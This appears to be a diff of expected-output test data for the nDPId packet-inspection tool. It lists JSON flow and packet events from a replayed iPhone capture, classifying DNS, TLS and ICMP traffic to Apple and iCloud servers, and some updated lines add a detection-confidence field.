+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454598758,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":1582454598758,"pkt":"xGGLNYKpxiwDYGpkCABFAADPdQkAAEARf7LAqAIBwKgCEQA10t8AuwWPZlqBgAABAAQAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACYIaW5pdC1jZG4MaXR1bmVzLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAyAAUAAQAAC+cAGwZpdHVuZXMFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAGARlNjczBWRzY2U5CmFrYW1haWVkZ2XAU8CLAAEAAQAAABcABF9lGDU="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
-00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
+00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454598759,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":1582454598759,"pkt":"xGGLNYKpxiwDYGpkCABFAADQatgAAEARieLAqAIBwKgCEQA1wtgAvFoLcEmBgAABAAQAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAJGQAmCGluaXQtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAABEeABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAbAARfZRg1"}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADjlzEAAEARXXbAqAIBwKgCEQA10BgAz2vgCAuBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMPAAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOnACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXwAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAPAARce00awJMAAQABAAAADwAEXHtNQA=="}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}}
 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADGO68AAEARuRXAqAIBwKgCEQA19D4AssJtjeyBgAABAAQAAAAAA2NsNAVhcHBsZQNjb20AAAEAAcAMAAUAAQAAD1IAJQdjbDQtY2RuDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADAKwAFAAEAAABkABgDY2w1BWFwcGxlA2NvbQdlZGdla2V5wEvAXAAFAAEAABGWABoGZTE0ODY4BWRzY2U5CmFrYW1haWVkZ2XAS8CAAAEAAQAAAA8ABGhJPR4="}
-00743{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.73.61.30"}}
+00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.73.61.30"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598766,"flow_last_seen":1582454598766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454598766,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454598766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454598766,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGHzLAqAIRXHr8UsWWAbuHn+lSAAAAALDC\/\/\/nwQAAAgQFtAEDAwcBAQgKEd\/ozwAAAAAEAgAA"}
-01311{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
+01337{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454598801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598801,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGajZcevxSwKgCEQG7xZaFiMYch5\/pU6BScSAUDwAAAgQFrAQCCAr\/dyjxEd\/ozwEDAwc="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454598867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598867,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+7MR+LlXwKgCEQG7xZWfE+IlqBre6aBScSBsSgAAAgQFrAEBCArpLCwFEd\/opwEDAwU="}
 00540{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454598885,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1582454598885,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4434AAEABEeTAqAIRwKgCAQMDBHsAAAAARQAAz8hDAABAESx4wKgCAcCoAhEANfeRALsAAA=="}
-00592{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498}
+00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454598886,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4zMkAAEABKJnAqAIRwKgCAQMDKS0AAAAARQAAz3UJAABAEX+ywKgCAcCoAhEANdLfALsAAA=="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454598886,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4CTAAAEAB7DLAqAIRwKgCAQMDOTMAAAAARQAA0GrYAABAEYniwKgCAcCoAhEANcLYALwAAA=="}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598888,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454598888,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG0pfAqAIRaEk9HsWXAbvBeeAaAAAAALDC\/\/9qCgAAAgQFtAEDAwcBAQgKEd\/pSQAAAAAEAgAA"}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454598888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGHz7AqAIRXHr8UsWWAbuHn+lThYjGHYAQBAuvrgAAAQEIChHf6Un\/dyjx"}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454598892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454598892,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrLvAqAIREfi5V8WVAbuoGt7pnxPiJoAQBAsEtQAAAQEIChHf6VPpLCwF"}
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
